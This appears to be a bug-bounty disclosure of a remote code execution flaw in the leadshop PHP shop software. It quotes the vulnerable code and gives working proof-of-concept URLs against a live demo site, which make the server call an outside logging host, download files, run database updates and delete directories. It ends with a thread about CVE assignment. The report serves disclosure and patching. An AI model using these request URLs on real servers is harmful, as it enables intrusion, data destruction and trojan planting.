There is an RCE vulnerability in qmpaas/leadshop
Reported on
Nov 7th 2022
Description
There is an RCE vulnerability in qmpaas/leadshop (https://github.com/qmpaas/leadshop) (v1.4.15). An attacker can access the file leadshop.php and call any existing function through GET to control the target host.
The vulnerability is in the leadshop/web/leadshop.php[27-61] file
public function run()
{
//读取参数数据
$include = isset($_GET['include']) ? $_GET['include'] : "";
$data = isset($_GET['data']) ? $_GET['data'] : "";
$meta = isset($_GET['meta']) ? $_GET['meta'] : "";
//执行数据方法
if ($include) {
return call_user_func_array([$this, $include], [$meta, $data]);
} else {
//用于判断是否非法操作
$token = isset($_GET['token']) ? $_GET['token'] : "";
$html = get_oss_url('index.html');
//判断锁文件是否存在,存在则是要执行更新
if (@file_exists(dirname(__DIR__) . "/install.lock")) {
if (@file_get_contents(dirname(__DIR__) . "/install.lock") === $token) {
if (!isset($_SESSION['self_update'])) {
//执行更新自身
$this->SilentSelfUpdate();
}
//执行更新操作
$version = get_version();
$body = $this->DownloadFile($html);
echo str_replace('{$version}', $version, $body);
} else {
die("检测到非法Token,请登录后台进入更新界面");
}
} else {
$version = get_version();
$body = $this->DownloadFile($html);
echo str_replace('{$version}', $version, $body);
}
}
}
The call_user_func_array function is used directly, and $include, $data, and $meta receive get parameters, which allows us to run all functions in this file (parameters less than or equal to 2), such as:
HttpGet (http access: poc: https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn),
ToMkdir (create folder: poc: https://demo.leadshop.vip/leadshop.php?include=ToMkdir&meta=1),
UpdateSql (perform database update: poc: https://demo.leadshop.vip/leadshop.php?include=UpdateSql),
DownloadFile (download file: poc: https://demo.leadshop.vip/leadshop.php?include=DownloadFile&meta=www.baidu.com/img/flexible/logo/pc/peak-result.png)
RemoveDir (remove directory: poc: https://demo.leadshop.vip/leadshop.php?include=RemoveDir&meta=[path])
Proof of Concept:
Poc:
https://demo.leadshop.vip/leadshop.php?include=HttpGet&meta=6nup69.dnslog.cn
DNSLOG picture:
Impact
Attackers can call any existing functions at will, control the target server to access, download, create files, delete files, etc.
Access may make the server a dos server.
Download, so that an attacker can download the PHP Trojan to the server.
Creating and deleting will destroy normal services.
More than ten IPs are using this service.
SECURITY.md exists
a year ago
Hi,@admin Can I contact maintainer to agree to assign a CVE?Thanks.
Hey👋 Before a CVE can be assigned the maintainer first has to validate your report and fix the vulnerability. At that point they will be asked if they want to assign a CVE just before they go public with the disclosure.
Great work @ouroborosscr 👌 Could you kindly propose/submit a fix for this vulnerability? Any help is appreciated.
@admin I contact maintainer to agree to assign a CVE. He said"I did it. See if it's right?" "The first time I used this platform." The first time I used this platform. Thanks.
@admin I contact maintainer to agree to assign a CVE. He said"I did it. See if it's right?" "The first time I used this platform." Please help us finish the work. Thanks.